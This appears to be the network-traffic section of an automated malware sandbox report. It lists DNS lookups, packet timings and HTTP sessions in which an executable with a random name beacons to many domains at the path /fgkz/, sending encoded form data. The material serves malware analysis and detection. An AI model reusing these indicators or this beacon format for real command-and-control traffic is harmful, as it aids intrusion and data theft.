                                Aug 30, 2024 07:21:35.223557949 CEST4975480192.168.2.5216.40.34.41
                                Aug 30, 2024 07:21:35.228458881 CEST8049754216.40.34.41192.168.2.5
                                Aug 30, 2024 07:21:35.711985111 CEST8049754216.40.34.41192.168.2.5
                                Aug 30, 2024 07:21:35.712038040 CEST8049754216.40.34.41192.168.2.5
                                Aug 30, 2024 07:21:35.712073088 CEST8049754216.40.34.41192.168.2.5
                                Aug 30, 2024 07:21:35.712119102 CEST8049754216.40.34.41192.168.2.5
                                Aug 30, 2024 07:21:35.712131977 CEST4975480192.168.2.5216.40.34.41
                                Aug 30, 2024 07:21:35.712152004 CEST8049754216.40.34.41192.168.2.5
                                Aug 30, 2024 07:21:35.712182999 CEST8049754216.40.34.41192.168.2.5
                                Aug 30, 2024 07:21:35.712208033 CEST4975480192.168.2.5216.40.34.41
                                Aug 30, 2024 07:21:35.712217093 CEST8049754216.40.34.41192.168.2.5
                                Aug 30, 2024 07:21:35.712318897 CEST4975480192.168.2.5216.40.34.41
                                Aug 30, 2024 07:21:35.712516069 CEST4975480192.168.2.5216.40.34.41
                                Aug 30, 2024 07:21:35.717292070 CEST8049754216.40.34.41192.168.2.5
                                Aug 30, 2024 07:21:40.779577017 CEST4975580192.168.2.5212.32.237.90
                                Aug 30, 2024 07:21:40.786710024 CEST8049755212.32.237.90192.168.2.5
                                Aug 30, 2024 07:21:40.791929007 CEST4975580192.168.2.5212.32.237.90
                                Aug 30, 2024 07:21:40.791929007 CEST4975580192.168.2.5212.32.237.90
                                Aug 30, 2024 07:21:40.796828032 CEST8049755212.32.237.90192.168.2.5
                                Aug 30, 2024 07:21:41.502012968 CEST8049755212.32.237.90192.168.2.5
                                Aug 30, 2024 07:21:41.502799988 CEST8049755212.32.237.90192.168.2.5
                                Aug 30, 2024 07:21:41.502866983 CEST4975580192.168.2.5212.32.237.90
                                Aug 30, 2024 07:21:42.304265022 CEST4975580192.168.2.5212.32.237.90
                                Aug 30, 2024 07:21:43.321597099 CEST4975680192.168.2.5212.32.237.90
                                Aug 30, 2024 07:21:43.326787949 CEST8049756212.32.237.90192.168.2.5
                                Aug 30, 2024 07:21:43.329904079 CEST4975680192.168.2.5212.32.237.90
                                Aug 30, 2024 07:21:43.333590031 CEST4975680192.168.2.5212.32.237.90
                                Aug 30, 2024 07:21:43.338690996 CEST8049756212.32.237.90192.168.2.5
                                Aug 30, 2024 07:21:43.937447071 CEST8049756212.32.237.90192.168.2.5
                                Aug 30, 2024 07:21:43.938206911 CEST8049756212.32.237.90192.168.2.5
                                Aug 30, 2024 07:21:43.938263893 CEST4975680192.168.2.5212.32.237.90
                                Aug 30, 2024 07:21:44.836118937 CEST4975680192.168.2.5212.32.237.90
                                Aug 30, 2024 07:21:45.851715088 CEST4975780192.168.2.5212.32.237.90
                                Aug 30, 2024 07:21:45.856676102 CEST8049757212.32.237.90192.168.2.5
                                Aug 30, 2024 07:21:45.856753111 CEST4975780192.168.2.5212.32.237.90
                                Aug 30, 2024 07:21:45.857043028 CEST4975780192.168.2.5212.32.237.90
                                Aug 30, 2024 07:21:45.861799002 CEST8049757212.32.237.90192.168.2.5
                                Aug 30, 2024 07:21:45.861959934 CEST8049757212.32.237.90192.168.2.5
                                Aug 30, 2024 07:21:47.366765976 CEST4975780192.168.2.5212.32.237.90
                                Aug 30, 2024 07:21:47.439721107 CEST8049757212.32.237.90192.168.2.5
                                Aug 30, 2024 07:21:47.443640947 CEST4975780192.168.2.5212.32.237.90
                                Aug 30, 2024 07:21:48.383078098 CEST4975880192.168.2.5212.32.237.90
                                Aug 30, 2024 07:21:48.389827967 CEST8049758212.32.237.90192.168.2.5
                                Aug 30, 2024 07:21:48.389898062 CEST4975880192.168.2.5212.32.237.90
                                Aug 30, 2024 07:21:48.390089035 CEST4975880192.168.2.5212.32.237.90
                                Aug 30, 2024 07:21:48.396995068 CEST8049758212.32.237.90192.168.2.5
                                Aug 30, 2024 07:21:52.388220072 CEST8049758212.32.237.90192.168.2.5
                                Aug 30, 2024 07:21:52.389616966 CEST8049758212.32.237.90192.168.2.5
                                Aug 30, 2024 07:21:52.389719009 CEST4975880192.168.2.5212.32.237.90
                                Aug 30, 2024 07:21:52.389780998 CEST4975880192.168.2.5212.32.237.90
                                Aug 30, 2024 07:21:52.394629955 CEST8049758212.32.237.90192.168.2.5
                                Aug 30, 2024 07:21:58.135881901 CEST4975980192.168.2.5167.172.228.26
                                Aug 30, 2024 07:21:58.141015053 CEST8049759167.172.228.26192.168.2.5
                                Aug 30, 2024 07:21:58.141109943 CEST4975980192.168.2.5167.172.228.26
                                Aug 30, 2024 07:21:58.141253948 CEST4975980192.168.2.5167.172.228.26
                                Aug 30, 2024 07:21:58.146099091 CEST8049759167.172.228.26192.168.2.5
                                Aug 30, 2024 07:21:58.802145958 CEST8049759167.172.228.26192.168.2.5
                                Aug 30, 2024 07:21:58.802237034 CEST8049759167.172.228.26192.168.2.5
                                Aug 30, 2024 07:21:58.807667017 CEST4975980192.168.2.5167.172.228.26
                                Aug 30, 2024 07:21:59.648094893 CEST4975980192.168.2.5167.172.228.26
                                Aug 30, 2024 07:22:00.667676926 CEST4976080192.168.2.5167.172.228.26
                                Aug 30, 2024 07:22:00.672709942 CEST8049760167.172.228.26192.168.2.5
                                Aug 30, 2024 07:22:00.675838947 CEST4976080192.168.2.5167.172.228.26
                                Aug 30, 2024 07:22:00.675838947 CEST4976080192.168.2.5167.172.228.26
                                Aug 30, 2024 07:22:00.680722952 CEST8049760167.172.228.26192.168.2.5
                                Aug 30, 2024 07:22:01.309004068 CEST8049760167.172.228.26192.168.2.5
                                Aug 30, 2024 07:22:01.309098005 CEST8049760167.172.228.26192.168.2.5
                                Aug 30, 2024 07:22:01.311655045 CEST4976080192.168.2.5167.172.228.26
                                Aug 30, 2024 07:22:02.539855003 CEST4976080192.168.2.5167.172.228.26
                                Aug 30, 2024 07:22:03.554476023 CEST4976180192.168.2.5167.172.228.26
                                Aug 30, 2024 07:22:03.559452057 CEST8049761167.172.228.26192.168.2.5
                                Aug 30, 2024 07:22:03.559539080 CEST4976180192.168.2.5167.172.228.26
                                Aug 30, 2024 07:22:03.559797049 CEST4976180192.168.2.5167.172.228.26
                                Aug 30, 2024 07:22:03.564954996 CEST8049761167.172.228.26192.168.2.5
                                Aug 30, 2024 07:22:03.565012932 CEST8049761167.172.228.26192.168.2.5
                                Aug 30, 2024 07:22:04.226394892 CEST8049761167.172.228.26192.168.2.5
                                Aug 30, 2024 07:22:04.226558924 CEST8049761167.172.228.26192.168.2.5
                                Aug 30, 2024 07:22:04.226609945 CEST4976180192.168.2.5167.172.228.26
                                Aug 30, 2024 07:22:05.071573973 CEST4976180192.168.2.5167.172.228.26
                                Aug 30, 2024 07:22:06.445044041 CEST4976280192.168.2.5167.172.228.26
                                Aug 30, 2024 07:22:06.449958086 CEST8049762167.172.228.26192.168.2.5
                                Aug 30, 2024 07:22:06.450037956 CEST4976280192.168.2.5167.172.228.26
                                Aug 30, 2024 07:22:06.450171947 CEST4976280192.168.2.5167.172.228.26
                                Aug 30, 2024 07:22:06.454884052 CEST8049762167.172.228.26192.168.2.5
                                Aug 30, 2024 07:22:07.118612051 CEST8049762167.172.228.26192.168.2.5
                                Aug 30, 2024 07:22:07.118645906 CEST8049762167.172.228.26192.168.2.5
                                Aug 30, 2024 07:22:07.118884087 CEST4976280192.168.2.5167.172.228.26
                                Aug 30, 2024 07:22:07.118884087 CEST4976280192.168.2.5167.172.228.26
                                Aug 30, 2024 07:22:07.123693943 CEST8049762167.172.228.26192.168.2.5

                                UDP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Aug 30, 2024 07:18:29.545569897 CEST6065253192.168.2.51.1.1.1
                                Aug 30, 2024 07:18:29.555486917 CEST53606521.1.1.1192.168.2.5
                                Aug 30, 2024 07:18:34.570622921 CEST5545353192.168.2.51.1.1.1
                                Aug 30, 2024 07:18:34.759422064 CEST53554531.1.1.1192.168.2.5
                                Aug 30, 2024 07:18:50.476824999 CEST5457453192.168.2.51.1.1.1
                                Aug 30, 2024 07:18:51.217811108 CEST53545741.1.1.1192.168.2.5
                                Aug 30, 2024 07:19:04.867420912 CEST6284253192.168.2.51.1.1.1
                                Aug 30, 2024 07:19:04.902364016 CEST53628421.1.1.1192.168.2.5
                                Aug 30, 2024 07:19:18.190711975 CEST5644353192.168.2.51.1.1.1
                                Aug 30, 2024 07:19:18.895576954 CEST53564431.1.1.1192.168.2.5
                                Aug 30, 2024 07:19:26.945678949 CEST6399853192.168.2.51.1.1.1
                                Aug 30, 2024 07:19:26.976891994 CEST53639981.1.1.1192.168.2.5
                                Aug 30, 2024 07:19:40.242646933 CEST5585953192.168.2.51.1.1.1
                                Aug 30, 2024 07:19:41.181454897 CEST53558591.1.1.1192.168.2.5
                                Aug 30, 2024 07:19:54.867475033 CEST5843253192.168.2.51.1.1.1
                                Aug 30, 2024 07:19:55.151886940 CEST53584321.1.1.1192.168.2.5
                                Aug 30, 2024 07:20:29.323508024 CEST5481153192.168.2.51.1.1.1
                                Aug 30, 2024 07:20:29.341907024 CEST53548111.1.1.1192.168.2.5
                                Aug 30, 2024 07:20:42.698527098 CEST6389253192.168.2.51.1.1.1
                                Aug 30, 2024 07:20:43.171616077 CEST53638921.1.1.1192.168.2.5
                                Aug 30, 2024 07:20:56.665747881 CEST5210853192.168.2.51.1.1.1
                                Aug 30, 2024 07:20:57.288856030 CEST53521081.1.1.1192.168.2.5
                                Aug 30, 2024 07:21:05.355535030 CEST6030853192.168.2.51.1.1.1
                                Aug 30, 2024 07:21:05.393239021 CEST53603081.1.1.1192.168.2.5
                                Aug 30, 2024 07:21:18.667542934 CEST5355353192.168.2.51.1.1.1
                                Aug 30, 2024 07:21:19.181998968 CEST53535531.1.1.1192.168.2.5
                                Aug 30, 2024 07:21:27.242516994 CEST6454253192.168.2.51.1.1.1
                                Aug 30, 2024 07:21:27.617201090 CEST53645421.1.1.1192.168.2.5
                                Aug 30, 2024 07:21:40.727566004 CEST5370953192.168.2.51.1.1.1
                                Aug 30, 2024 07:21:40.775456905 CEST53537091.1.1.1192.168.2.5
                                Aug 30, 2024 07:21:57.398650885 CEST5254553192.168.2.51.1.1.1
                                Aug 30, 2024 07:21:58.135070086 CEST53525451.1.1.1192.168.2.5

                                DNS Queries

                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                Aug 30, 2024 07:18:29.545569897 CEST192.168.2.51.1.1.10x968dStandard query (0)www.7789552398763.netA (IP address)IN (0x0001)false
                                Aug 30, 2024 07:18:34.570622921 CEST192.168.2.51.1.1.10x8886Standard query (0)www.pheonix-travels.comA (IP address)IN (0x0001)false
                                Aug 30, 2024 07:18:50.476824999 CEST192.168.2.51.1.1.10x915dStandard query (0)www.nexgen-gaming.comA (IP address)IN (0x0001)false
                                Aug 30, 2024 07:19:04.867420912 CEST192.168.2.51.1.1.10xbe2fStandard query (0)www.theranchobizarro.comA (IP address)IN (0x0001)false
                                Aug 30, 2024 07:19:18.190711975 CEST192.168.2.51.1.1.10x65e2Standard query (0)www.heilao9.xyzA (IP address)IN (0x0001)false
                                Aug 30, 2024 07:19:26.945678949 CEST192.168.2.51.1.1.10xdb1bStandard query (0)www.sciencebot.sbsA (IP address)IN (0x0001)false
                                Aug 30, 2024 07:19:40.242646933 CEST192.168.2.51.1.1.10xc47Standard query (0)www.gpcamservices.comA (IP address)IN (0x0001)false
                                Aug 30, 2024 07:19:54.867475033 CEST192.168.2.51.1.1.10x5a55Standard query (0)www.slimdut.topA (IP address)IN (0x0001)false
                                Aug 30, 2024 07:20:29.323508024 CEST192.168.2.51.1.1.10x4f67Standard query (0)www.otomain.infoA (IP address)IN (0x0001)false
                                Aug 30, 2024 07:20:42.698527098 CEST192.168.2.51.1.1.10x7175Standard query (0)www.uty803.comA (IP address)IN (0x0001)false
                                Aug 30, 2024 07:20:56.665747881 CEST192.168.2.51.1.1.10xc64dStandard query (0)www.mlfloor.netA (IP address)IN (0x0001)false
                                Aug 30, 2024 07:21:05.355535030 CEST192.168.2.51.1.1.10x744dStandard query (0)www.nathanladd.softwareA (IP address)IN (0x0001)false
                                Aug 30, 2024 07:21:18.667542934 CEST192.168.2.51.1.1.10x2ea6Standard query (0)www.defengnm.comA (IP address)IN (0x0001)false
                                Aug 30, 2024 07:21:27.242516994 CEST192.168.2.51.1.1.10xf64aStandard query (0)www.hugelmann.orgA (IP address)IN (0x0001)false
                                Aug 30, 2024 07:21:40.727566004 CEST192.168.2.51.1.1.10x61fcStandard query (0)www.sportspaj.comA (IP address)IN (0x0001)false
                                Aug 30, 2024 07:21:57.398650885 CEST192.168.2.51.1.1.10xd147Standard query (0)www.noobblaster.comA (IP address)IN (0x0001)false

                                DNS Answers

                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                Aug 30, 2024 07:18:29.555486917 CEST1.1.1.1192.168.2.50x968dName error (3)www.7789552398763.netnonenoneA (IP address)IN (0x0001)false
                                Aug 30, 2024 07:18:34.759422064 CEST1.1.1.1192.168.2.50x8886No error (0)www.pheonix-travels.comparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)false
                                Aug 30, 2024 07:18:34.759422064 CEST1.1.1.1192.168.2.50x8886No error (0)parkingpage.namecheap.com91.195.240.19A (IP address)IN (0x0001)false
                                Aug 30, 2024 07:18:51.217811108 CEST1.1.1.1192.168.2.50x915dNo error (0)www.nexgen-gaming.comnexgen-gaming.comCNAME (Canonical name)IN (0x0001)false
                                Aug 30, 2024 07:18:51.217811108 CEST1.1.1.1192.168.2.50x915dNo error (0)nexgen-gaming.com167.172.228.26A (IP address)IN (0x0001)false
                                Aug 30, 2024 07:19:04.902364016 CEST1.1.1.1192.168.2.50xbe2fNo error (0)www.theranchobizarro.com52.9.242.57A (IP address)IN (0x0001)false
                                Aug 30, 2024 07:19:18.895576954 CEST1.1.1.1192.168.2.50x65e2Name error (3)www.heilao9.xyznonenoneA (IP address)IN (0x0001)false
                                Aug 30, 2024 07:19:26.976891994 CEST1.1.1.1192.168.2.50xdb1bNo error (0)www.sciencebot.sbsparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)false
                                Aug 30, 2024 07:19:26.976891994 CEST1.1.1.1192.168.2.50xdb1bNo error (0)parkingpage.namecheap.com91.195.240.19A (IP address)IN (0x0001)false
                                Aug 30, 2024 07:19:41.181454897 CEST1.1.1.1192.168.2.50xc47No error (0)www.gpcamservices.comgpcamservices.comCNAME (Canonical name)IN (0x0001)false
                                Aug 30, 2024 07:19:41.181454897 CEST1.1.1.1192.168.2.50xc47No error (0)gpcamservices.com119.18.54.85A (IP address)IN (0x0001)false
                                Aug 30, 2024 07:19:55.151886940 CEST1.1.1.1192.168.2.50x5a55No error (0)www.slimdut.top66.29.154.248A (IP address)IN (0x0001)false
                                Aug 30, 2024 07:20:29.341907024 CEST1.1.1.1192.168.2.50x4f67No error (0)www.otomain.info104.21.92.135A (IP address)IN (0x0001)false
                                Aug 30, 2024 07:20:29.341907024 CEST1.1.1.1192.168.2.50x4f67No error (0)www.otomain.info172.67.194.133A (IP address)IN (0x0001)false
                                Aug 30, 2024 07:20:43.171616077 CEST1.1.1.1192.168.2.50x7175No error (0)www.uty803.com2xin1.zhanghonghong.comCNAME (Canonical name)IN (0x0001)false
                                Aug 30, 2024 07:20:43.171616077 CEST1.1.1.1192.168.2.50x7175No error (0)2xin1.zhanghonghong.com122.10.12.59A (IP address)IN (0x0001)false
                                Aug 30, 2024 07:21:05.393239021 CEST1.1.1.1192.168.2.50x744dNo error (0)www.nathanladd.softwareparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)false
                                Aug 30, 2024 07:21:05.393239021 CEST1.1.1.1192.168.2.50x744dNo error (0)parkingpage.namecheap.com91.195.240.19A (IP address)IN (0x0001)false
                                Aug 30, 2024 07:21:19.181998968 CEST1.1.1.1192.168.2.50x2ea6Name error (3)www.defengnm.comnonenoneA (IP address)IN (0x0001)false
                                Aug 30, 2024 07:21:27.617201090 CEST1.1.1.1192.168.2.50xf64aNo error (0)www.hugelmann.org216.40.34.41A (IP address)IN (0x0001)false
                                Aug 30, 2024 07:21:40.775456905 CEST1.1.1.1192.168.2.50x61fcNo error (0)www.sportspaj.com212.32.237.90A (IP address)IN (0x0001)false
                                Aug 30, 2024 07:21:58.135070086 CEST1.1.1.1192.168.2.50xd147No error (0)www.noobblaster.comnoobblaster.comCNAME (Canonical name)IN (0x0001)false
                                Aug 30, 2024 07:21:58.135070086 CEST1.1.1.1192.168.2.50xd147No error (0)noobblaster.com167.172.228.26A (IP address)IN (0x0001)false

                                HTTP Request Dependency Graph

                                • www.pheonix-travels.com
                                • www.nexgen-gaming.com
                                • www.theranchobizarro.com
                                • www.sciencebot.sbs
                                • www.gpcamservices.com
                                • www.slimdut.top
                                • www.otomain.info
                                • www.uty803.com
                                • www.nathanladd.software
                                • www.hugelmann.org
                                • www.sportspaj.com
                                • www.noobblaster.com

                                HTTP Packets

                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.54971791.195.240.19805264C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                TimestampBytes transferredDirectionData
                                Aug 30, 2024 07:18:34.776391029 CEST353OUTGET /fgkz/?4f2t8=qUFBQvWBSx+bgMqyDmLQ5iNb4eTiibWqPMlygN/fc4+dM2Q0fApyvpqDNInFWFQ7PUEWbfd7zdq6gjmLUkGdSLdX5yRbFI8ZXQ==&nFeHa=dbNpTj HTTP/1.1
                                Accept: */*
                                Accept-Language: en-us
                                Host: www.pheonix-travels.com
                                Connection: close
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                Aug 30, 2024 07:18:35.434683084 CEST208INHTTP/1.1 403 Forbidden
                                content-length: 93
                                cache-control: no-cache
                                content-type: text/html
                                connection: close
                                Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                1192.168.2.549718167.172.228.26805264C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                TimestampBytes transferredDirectionData
                                Aug 30, 2024 07:18:51.223649025 CEST633OUTPOST /fgkz/ HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-us
                                Host: www.nexgen-gaming.com
                                Connection: close
                                Content-Length: 186
                                Cache-Control: max-age=0
                                Content-Type: application/x-www-form-urlencoded
                                Origin: http://www.nexgen-gaming.com
                                Referer: http://www.nexgen-gaming.com/fgkz/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                Data Raw: 34 66 32 74 38 3d 47 33 37 35 42 6e 53 6c 59 64 59 7a 57 62 62 73 37 4e 48 34 43 66 4d 6b 36 6c 75 2f 4d 2b 56 30 54 75 61 6e 33 49 31 54 6c 6f 7a 4c 66 63 65 30 59 75 62 58 6a 6c 43 71 62 76 56 31 64 6f 64 78 59 44 74 62 2b 2b 37 56 2b 78 44 66 32 6a 6b 42 33 2f 44 58 5a 78 79 2f 64 33 33 2b 4f 35 78 58 73 64 6d 43 4b 69 6c 38 69 32 6e 71 33 49 32 75 34 5a 6c 52 4f 6e 75 41 46 69 31 36 66 46 31 36 35 4b 56 58 63 58 73 68 7a 69 33 4f 62 4f 59 4c 6c 76 52 49 57 63 76 4b 69 53 6b 48 70 55 4f 2b 37 2f 67 74 41 43 52 71 75 74 61 6c 51 72 56 75 30 77 3d 3d
                                Data Ascii: 4f2t8=G375BnSlYdYzWbbs7NH4CfMk6lu/M+V0Tuan3I1TlozLfce0YubXjlCqbvV1dodxYDtb++7V+xDf2jkB3/DXZxy/d33+O5xXsdmCKil8i2nq3I2u4ZlROnuAFi16fF165KVXcXshzi3ObOYLlvRIWcvKiSkHpUO+7/gtACRqutalQrVu0w==
                                Aug 30, 2024 07:18:51.909374952 CEST154INHTTP/1.1 302
                                Server: nginx/1.20.1
                                Date: Fri, 30 Aug 2024 05:18:51 GMT
                                Content-Length: 0
                                Connection: close
                                Location: http://ww1.nexgen-gaming.com


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                2192.168.2.549719167.172.228.26805264C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                TimestampBytes transferredDirectionData
                                Aug 30, 2024 07:18:53.749242067 CEST653OUTPOST /fgkz/ HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-us
                                Host: www.nexgen-gaming.com
                                Connection: close
                                Content-Length: 206
                                Cache-Control: max-age=0
                                Content-Type: application/x-www-form-urlencoded
                                Origin: http://www.nexgen-gaming.com
                                Referer: http://www.nexgen-gaming.com/fgkz/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                Data Raw: 34 66 32 74 38 3d 47 33 37 35 42 6e 53 6c 59 64 59 7a 45 6f 54 73 30 4b 37 34 45 2f 4d 6e 6d 31 75 2f 65 2b 56 77 54 75 57 6e 33 49 64 44 6b 62 48 4c 65 39 75 30 5a 76 62 58 6d 6c 43 71 44 2f 56 77 65 59 63 39 59 43 52 39 2b 38 76 56 2b 78 58 66 32 6a 55 42 77 4f 44 57 59 68 79 39 49 6e 33 38 51 4a 78 58 73 64 6d 43 4b 69 59 5a 69 32 2f 71 32 35 47 75 2f 49 6c 57 52 58 75 44 41 69 31 36 62 46 31 2b 35 4b 56 6c 63 58 63 59 7a 67 50 4f 62 4f 6f 4c 6b 2b 52 4c 5a 63 76 51 6d 53 6c 4f 6e 57 2f 37 31 63 4d 76 4c 78 64 72 37 50 6e 46 52 2b 35 39 7a 41 72 34 33 68 4e 4b 79 74 2b 68 62 47 35 77 69 5a 64 6a 73 70 30 3d
                                Data Ascii: 4f2t8=G375BnSlYdYzEoTs0K74E/Mnm1u/e+VwTuWn3IdDkbHLe9u0ZvbXmlCqD/VweYc9YCR9+8vV+xXf2jUBwODWYhy9In38QJxXsdmCKiYZi2/q25Gu/IlWRXuDAi16bF1+5KVlcXcYzgPObOoLk+RLZcvQmSlOnW/71cMvLxdr7PnFR+59zAr43hNKyt+hbG5wiZdjsp0=


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                3192.168.2.549721167.172.228.26805264C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                TimestampBytes transferredDirectionData
                                Aug 30, 2024 07:18:56.278666973 CEST1666OUTPOST /fgkz/ HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-us
                                Host: www.nexgen-gaming.com
                                Connection: close
                                Content-Length: 1218
                                Cache-Control: max-age=0
                                Content-Type: application/x-www-form-urlencoded
                                Origin: http://www.nexgen-gaming.com
                                Referer: http://www.nexgen-gaming.com/fgkz/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                Data Raw: 34 66 32 74 38 3d 47 33 37 35 42 6e 53 6c 59 64 59 7a 45 6f 54 73 30 4b 37 34 45 2f 4d 6e 6d 31 75 2f 65 2b 56 77 54 75 57 6e 33 49 64 44 6b 62 66 4c 66 50 32 30 5a 49 6e 58 68 6c 43 71 64 76 56 78 65 59 63 77 59 44 35 35 2b 38 7a 46 2b 33 54 66 33 43 30 42 78 38 37 57 57 68 79 39 58 58 33 35 4f 35 77 66 73 63 4b 47 4b 69 6f 5a 69 32 2f 71 32 37 65 75 70 4a 6c 57 43 48 75 41 46 69 31 4d 66 46 31 61 35 4b 4e 31 63 54 41 58 79 52 76 4f 62 75 34 4c 69 4d 35 4c 51 63 76 57 68 53 6c 57 6e 57 7a 77 31 63 67 46 4c 79 41 41 37 4e 33 46 53 4b 42 69 67 56 4b 69 6a 41 68 5a 78 76 71 79 43 57 31 2b 35 4d 4e 6c 79 4e 32 65 64 36 69 62 44 58 34 56 6b 48 6d 47 65 36 70 77 33 4b 72 61 49 66 53 4c 34 39 72 6f 62 78 76 42 6e 56 4e 46 57 71 33 4f 5a 47 76 4b 54 79 2b 65 55 4e 72 4d 6c 43 73 6b 32 6b 34 48 57 42 59 6c 57 30 5a 47 44 78 41 34 70 6d 6a 75 37 4f 45 31 54 4d 66 45 76 65 42 58 38 67 2b 59 2f 43 68 53 37 68 71 57 48 2f 47 6a 5a 78 76 59 34 58 2b 2f 2b 2b 59 74 47 53 43 37 4f 79 67 53 5a 35 62 57 6a 51 63 74 [TRUNCATED]
                                Data Ascii: 4f2t8=G375BnSlYdYzEoTs0K74E/Mnm1u/e+VwTuWn3IdDkbfLfP20ZInXhlCqdvVxeYcwYD55+8zF+3Tf3C0Bx87WWhy9XX35O5wfscKGKioZi2/q27eupJlWCHuAFi1MfF1a5KN1cTAXyRvObu4LiM5LQcvWhSlWnWzw1cgFLyAA7N3FSKBigVKijAhZxvqyCW1+5MNlyN2ed6ibDX4VkHmGe6pw3KraIfSL49robxvBnVNFWq3OZGvKTy+eUNrMlCsk2k4HWBYlW0ZGDxA4pmju7OE1TMfEveBX8g+Y/ChS7hqWH/GjZxvY4X+/++YtGSC7OygSZ5bWjQctOHIOm8oxXfzp4rTlK5CnJzB1apB826Jw1R64xZElgDNl7S7pCNQHRp0o2YBiNLhHOYBpb2E72izP+abnz/DixrzzXQlKvUw47qkl/JOlcsQP+hAjHCE/g4m+X8KZH9J9oxcIr5aiH3+B2pCQCCMQFBdXtMVOUGTe3fudig2nsF/Ysn3+iznXruaXvzCvK9zZhneAoCxCZtKXhuIjDlznPvwLxpAG0yAKgXIOmkbOu2L3e/j7tkXVbmI4d2HThgTwHrSfjBMeYLY7PuOEIvyGTxXap8+8ldIcn2UIP6sBwq29gDGtveWT6qE6t4aaETggDfEjDz8x3DwpGjTLJmDBGKKSiooTbu2t9JNPJi0gVsi1xj5HowOE1Y9clt53b+52a1BliNmqvUxsG/uUNtpCKVRxz/5bfyCbPKPGyhv4PQJ6HbKo/ipnFxiRCA8rHjZTggG6tbl/jYYdYmQKshgUGLvK9zhdKG71ZHJ7THi6kb39DIu0k50nsIyHstRr1IVo4WWtid7ENp9DIx0XvT/rojzzINooWeFzhD6owvb68CVMk4u66+3IwuN7s50lsjeMCah5ZMdYMDqrZ7LSyn3YAEze4/PicS+Eej8I18B8Mr/ohGLK5HBJ006EfapL+2xK+n/oZxLid2GtrH1UOWJw4hLZoWP2WSO6yp [TRUNCATED]


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                4192.168.2.549722167.172.228.26805264C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                TimestampBytes transferredDirectionData
                                Aug 30, 2024 07:18:59.157587051 CEST351OUTGET /fgkz/?nFeHa=dbNpTj&4f2t8=L1TZCS35bu0vOYHNzZCPIdU0sWDhLvNiLfum3bQ18rX1WKbURfbupmyOYdxIRu4IbjlY68Wfuxyw3QRU1unQYy2+VkzFUIUgoQ== HTTP/1.1
                                Accept: */*
                                Accept-Language: en-us
                                Host: www.nexgen-gaming.com
                                Connection: close
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                Aug 30, 2024 07:18:59.864928961 CEST154INHTTP/1.1 302
                                Server: nginx/1.20.1
                                Date: Fri, 30 Aug 2024 05:18:59 GMT
                                Content-Length: 0
                                Connection: close
                                Location: http://ww1.nexgen-gaming.com


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                5192.168.2.54972352.9.242.57805264C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                TimestampBytes transferredDirectionData
                                Aug 30, 2024 07:19:04.908191919 CEST642OUTPOST /fgkz/ HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-us
                                Host: www.theranchobizarro.com
                                Connection: close
                                Content-Length: 186
                                Cache-Control: max-age=0
                                Content-Type: application/x-www-form-urlencoded
                                Origin: http://www.theranchobizarro.com
                                Referer: http://www.theranchobizarro.com/fgkz/
